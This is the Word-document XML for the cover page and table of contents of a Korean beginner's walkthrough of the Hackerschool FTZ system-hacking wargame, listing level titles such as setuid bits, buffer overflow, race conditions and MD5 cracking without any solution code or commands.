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295" w:rsidRDefault="00714295" w:rsidP="00714295">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00714295" w:rsidRDefault="00714295" w:rsidP="00714295">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
        </w:rPr>
        <w:t>초급 해커를 위한</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0090193C" w:rsidRDefault="00714295" w:rsidP="00714295">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714295">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
        </w:rPr>
        <w:t>해커스쿨 FTZ 풀이</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A6969" w:rsidRPr="00714295" w:rsidRDefault="005A6969" w:rsidP="00714295">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
        </w:rPr>
        <w:t>(시스템 해킹 입문)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714295" w:rsidRDefault="00714295" w:rsidP="00714295">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00714295" w:rsidRDefault="00714295" w:rsidP="005A6969">
      <w:pPr>
        <w:ind w:right="2080"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00714295" w:rsidRDefault="00714295" w:rsidP="00714295">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>CATs(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>Cyber Attack Terminators)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714295" w:rsidRDefault="00714295" w:rsidP="00714295">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">해킹대회 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>스터디</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve"> 그룹</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714295" w:rsidRDefault="00714295" w:rsidP="00714295">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714295">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>이 진 영</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00052E7C" w:rsidRDefault="00052E7C" w:rsidP="003F447A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005A6969" w:rsidRDefault="005A6969" w:rsidP="003F447A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00052E7C" w:rsidRDefault="00543CE4" w:rsidP="004707BD">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="003F447A" w:rsidRPr="00052E7C">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>목차</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD6F9D" w:rsidRPr="00BD6F9D" w:rsidRDefault="00BD6F9D" w:rsidP="004707BD">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="3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6"/>
      </w:tblGrid>
      <w:tr w:rsidR="003F447A" w:rsidRPr="00BD6F9D" w:rsidTr="003F447A">
        <w:trPr>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
          <w:hidden/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="003F447A" w:rsidRPr="003F447A" w:rsidRDefault="003F447A" w:rsidP="003F447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vanish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3F447A" w:rsidRPr="003F447A" w:rsidRDefault="001E674C" w:rsidP="003F447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vanish/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId8" w:history="1">
              <w:r w:rsidR="003F447A" w:rsidRPr="003F447A">
                <w:rPr>
                  <w:rFonts w:ascii="굴림" w:eastAsia="굴림" w:hAnsi="굴림" w:cs="굴림"/>
                  <w:vanish/>
                  <w:color w:val="000000"/>
                  <w:kern w:val="0"/>
                  <w:sz w:val="18"/>
                </w:rPr>
                <w:t>해커스쿨 FTZ level1 [find 명령어 사용법, 특수권한 비트 개념, file descriptor]</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="003F447A" w:rsidRPr="003F447A">
              <w:rPr>
                <w:rFonts w:ascii="굴림" w:eastAsia="굴림" w:hAnsi="굴림" w:cs="굴림"/>
                <w:vanish/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="003F447A">
              <w:rPr>
                <w:rFonts w:ascii="굴림" w:eastAsia="굴림" w:hAnsi="굴림" w:cs="굴림"/>
                <w:vanish/>
                <w:kern w:val="0"/>
                <w:sz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1in;height:18pt" o:ole="">
                  <v:imagedata r:id="rId9" o:title=""/>
                </v:shape>
                <w:control r:id="rId10" w:name="DefaultOcxName" w:shapeid="_x0000_i1028"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="003F447A" w:rsidRPr="009A134E" w:rsidRDefault="003F447A" w:rsidP="00645C86">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A134E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 xml:space="preserve">level1 </w:t>
      </w:r>
      <w:r w:rsidR="00645C86" w:rsidRPr="009A134E">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009A134E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>[find 명령어 사용법, 특수권한 비트 개념, file descriptor]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506"/>
        <w:gridCol w:w="6"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AA4F21" w:rsidRPr="00AA4F21" w:rsidTr="00AA4F21">
        <w:trPr>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
          <w:hidden/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00AA4F21" w:rsidRPr="00AA4F21" w:rsidRDefault="00AA4F21" w:rsidP="00645C8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vanish/>
                <w:kern w:val="0"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00AA4F21" w:rsidRPr="00AA4F21" w:rsidRDefault="001E674C" w:rsidP="00645C8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vanish/>
                <w:kern w:val="0"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId11" w:history="1">
              <w:r w:rsidR="00AA4F21" w:rsidRPr="009A134E">
                <w:rPr>
                  <w:rFonts w:ascii="굴림" w:eastAsia="굴림" w:hAnsi="굴림" w:cs="굴림"/>
                  <w:vanish/>
                  <w:color w:val="000000"/>
                  <w:kern w:val="0"/>
                  <w:sz w:val="30"/>
                  <w:szCs w:val="30"/>
                </w:rPr>
                <w:t>해커스쿨 FTZ level2</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE054C" w:rsidRPr="00EE054C" w:rsidTr="00EE054C">
        <w:trPr>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00EE054C" w:rsidRPr="00EE054C" w:rsidRDefault="00AA4F21" w:rsidP="00645C8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vanish/>
                <w:kern w:val="0"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009A134E">
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
                <w:b/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
              </w:rPr>
              <w:t>level2</w:t>
            </w:r>
            <w:r w:rsidRPr="009A134E">
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00645C86" w:rsidRPr="009A134E">
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="009A134E">
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
              </w:rPr>
              <w:t>[vi editor 고급기능을 이용한 간단 해킹]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00EE054C" w:rsidRPr="00EE054C" w:rsidRDefault="001E674C" w:rsidP="00645C8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vanish/>
                <w:kern w:val="0"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId12" w:history="1">
              <w:r w:rsidR="00EE054C" w:rsidRPr="009A134E">
                <w:rPr>
                  <w:rFonts w:ascii="굴림" w:eastAsia="굴림" w:hAnsi="굴림" w:cs="굴림"/>
                  <w:vanish/>
                  <w:color w:val="000000"/>
                  <w:kern w:val="0"/>
                  <w:sz w:val="30"/>
                  <w:szCs w:val="30"/>
                </w:rPr>
                <w:t>해커스쿨 FTZ level3 [동시에 여러 명령어 사용, 문자열 형태로 인자 전달]</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00EE054C" w:rsidRPr="009A134E">
              <w:rPr>
                <w:rFonts w:ascii="굴림" w:eastAsia="굴림" w:hAnsi="굴림" w:cs="굴림"/>
                <w:vanish/>
                <w:kern w:val="0"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00AA4F21" w:rsidRPr="009A134E" w:rsidRDefault="00EE054C" w:rsidP="00645C86">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A134E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 xml:space="preserve">level3 </w:t>
      </w:r>
      <w:r w:rsidR="00645C86" w:rsidRPr="009A134E">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009A134E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>[</w:t>
      </w:r>
      <w:r w:rsidRPr="009A134E">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>system 함수의 취약점</w:t>
      </w:r>
      <w:r w:rsidRPr="009A134E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>]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6"/>
      </w:tblGrid>
      <w:tr w:rsidR="00ED422C" w:rsidRPr="00ED422C" w:rsidTr="00ED422C">
        <w:trPr>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
          <w:hidden/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00ED422C" w:rsidRPr="00ED422C" w:rsidRDefault="00ED422C" w:rsidP="00645C8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vanish/>
                <w:kern w:val="0"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00ED422C" w:rsidRPr="00ED422C" w:rsidRDefault="001E674C" w:rsidP="00645C8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vanish/>
                <w:kern w:val="0"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId13" w:history="1">
              <w:r w:rsidR="00ED422C" w:rsidRPr="009A134E">
                <w:rPr>
                  <w:rFonts w:ascii="굴림" w:eastAsia="굴림" w:hAnsi="굴림" w:cs="굴림"/>
                  <w:vanish/>
                  <w:color w:val="000000"/>
                  <w:kern w:val="0"/>
                  <w:sz w:val="30"/>
                  <w:szCs w:val="30"/>
                </w:rPr>
                <w:t>해커스쿨 FTZ level3 [버퍼 오버플로우]</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00EE054C" w:rsidRPr="009A134E" w:rsidRDefault="00ED422C" w:rsidP="00645C86">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A134E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 xml:space="preserve">level3 </w:t>
      </w:r>
      <w:r w:rsidR="00645C86" w:rsidRPr="009A134E">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009A134E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 xml:space="preserve">[버퍼 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A134E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>오버플로우</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A134E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>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED422C" w:rsidRPr="009A134E" w:rsidRDefault="00C035A0" w:rsidP="00645C86">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A134E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 xml:space="preserve">level4 </w:t>
      </w:r>
      <w:r w:rsidR="00645C86" w:rsidRPr="009A134E">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009A134E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>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A134E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>xinetd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A134E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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A134E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>백도어</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A134E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>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C035A0" w:rsidRPr="009A134E" w:rsidRDefault="00C035A0" w:rsidP="00645C86">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A134E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 xml:space="preserve">level5 </w:t>
      </w:r>
      <w:r w:rsidR="00645C86" w:rsidRPr="009A134E">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009A134E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>[레이스 컨디션]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C035A0" w:rsidRPr="009A134E" w:rsidRDefault="00C035A0" w:rsidP="00645C86">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A134E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 xml:space="preserve">level6 </w:t>
      </w:r>
      <w:r w:rsidR="00645C86" w:rsidRPr="009A134E">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009A134E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>[시스템 인터럽트]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C035A0" w:rsidRPr="009A134E" w:rsidRDefault="000D1C97" w:rsidP="00645C86">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A134E">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">level7 </w:t>
      </w:r>
      <w:r w:rsidR="00645C86" w:rsidRPr="009A134E">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009A134E">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>(문제 해결을 위한 파일이 삭제되어 있어서 skip)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D1C97" w:rsidRPr="009A134E" w:rsidRDefault="000D1C97" w:rsidP="00645C86">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A134E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 xml:space="preserve">level8 </w:t>
      </w:r>
      <w:r w:rsidR="00645C86" w:rsidRPr="009A134E">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009A134E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>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A134E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>존더리퍼</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A134E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 xml:space="preserve"> md5 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A134E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>크랙</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A134E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>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA4F21" w:rsidRPr="009A134E" w:rsidRDefault="00686326" w:rsidP="00645C86">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
